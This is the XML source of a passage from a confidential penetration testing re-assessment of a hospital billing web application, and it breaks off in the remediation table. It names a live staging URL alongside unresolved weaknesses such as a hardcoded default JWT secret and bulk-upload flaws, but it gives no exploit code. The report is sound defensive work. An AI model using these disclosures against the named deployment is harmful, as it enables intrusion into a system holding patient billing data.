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80" w:before="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1F3864" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABILITY ASSESSMENT &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1F3864" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="2E5DA3" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Hospital Billing System  |  Re-Assessment  |  April 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1F3864" w:val="clear"/>
        <w:spacing w:after="900" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>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Document Title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VAPT Re-Assessment Report — Hospital Billing System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:gridSpan w:val="1"/>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Version</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3.0 (Final)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:gridSpan w:val="1"/>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Assessment Type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Gray-Box Web Application Penetration Test &amp; Source Code Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:gridSpan w:val="1"/>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Testing Dates</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April 20, 2026 - April 23, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:gridSpan w:val="1"/>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Target Application</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Hospital Billing System (Multi-Tenant SaaS Platform)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:gridSpan w:val="1"/>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Live Environment</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https://hospital-billing-system-1.onrender.com/ (Staging Branch)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:gridSpan w:val="1"/>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Branches Assessed</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main, staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:gridSpan w:val="1"/>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Prepared By</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Security Auditing Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:gridSpan w:val="1"/>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Classification</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STRICTLY CONFIDENTIAL - For Authorised Recipients Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEF9E7" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="180" w:right="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D35400"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">WARNING: This document contains sensitive security information. Unauthorised disclosure is strictly prohibited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="720" w:right="1440" w:bottom="720" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents the findings of a comprehensive Vulnerability Assessment and Penetration Testing (VAPT) re-engagement performed against the Hospital Billing System. The assessment was commissioned following a prior audit (April 20-21, 2026) which identified and remediated five (5) vulnerabilities. The objective of this re-assessment was to verify the efficacy of prior remediations and to evaluate the newly implemented bulk upload feature for additional security exposures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The re-assessment determined that several previously identified vulnerabilities remain present in the source code repository, indicating that remediation actions were applied exclusively to the deployment environment without being committed back to version control. This constitutes a critical DevSecOps failure: any re-deployment from the repository would automatically re-introduce all previously patched vulnerabilities. Additionally, the newly introduced bulk upload functionality contains four (4) exploitable findings not present in the prior assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5DA3"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1  Risk Profile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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Prior Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Post-Remediation (Claimed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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This Re-Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>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w:t>
            </w:r>
          </w:p>
        </w:tc>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>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b/>
                <w:bCs/>
                <w:color w:val="B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:gridSpan w:val="1"/>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bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>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w:t>
            </w:r>
          </w:p>
        </w:tc>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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:gridSpan w:val="1"/>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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:gridSpan w:val="1"/>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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:gridSpan w:val="1"/>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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FDEDEC" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="180" w:right="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">OVERALL RISK POSTURE: HIGH  -  The application is NOT APPROVED for production deployment in its current state. All Critical and High findings must be resolved and verified before re-assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  Assessment Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This re-assessment adhered to industry-standard methodologies, combining the Open Web Application Security Project (OWASP) Testing Guide v4.2, the Penetration Testing Execution Standard (PTES), and CVSS v3.1 for vulnerability scoring. The engagement was conducted as a gray-box assessment, with access to the application source code and test credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5DA3"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1  Testing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6440"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="644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Activities</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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Repository inspection across main and staging branches; commit history analysis; technology stack enumeration; endpoint mapping via README and render.yaml.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Static Analysis (SAST)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="644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Manual and pattern-based source code review focusing on authentication configuration, secret management, file upload handling, error management, and CORS policy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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3</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Dynamic Analysis (DAST)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="64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Live testing of staging environment: authentication endpoints, bulk upload feature, HTTP response headers, error disclosure, CORS origin validation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Remediation Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="644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Regression analysis of all five prior findings against current source code to confirm or deny remediation status.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5DA3"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2  Scope of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Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:gridSpan w:val="1"/>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bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">IN SCOPE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Backend API (FastAPI) - backend/app/api/v1/*  |  Frontend Application (React 18 + Vite)  |  JWT Auth &amp; Authorisation  |  File Upload Processing (Bulk Tests + Clinic Logo)  |  Configuration &amp; Environment Management  |  CI/CD deployment configuration (render.yaml)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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OUT OF SCOPE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Underlying OS and container infrastructure  |  Third-party services (Render.com, SendGrid)  |  Social engineering or physical penetration testing  |  Database server-level configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  Prior Finding Remediation Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The following table summarises the verification status of all five findings from the prior VAPT engagement. A status of "VERIFIED OPEN" indicates that the vulnerable code pattern remains present in the source code repository, regardless of any runtime-only patch that may have been applied to the live deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>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200"/>
        <w:gridCol w:w="1260"/>
        <w:gridCol w:w="3200"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>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Finding</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Prior Sev.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Current Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Verification Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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F-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Hardcoded Default JWT Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
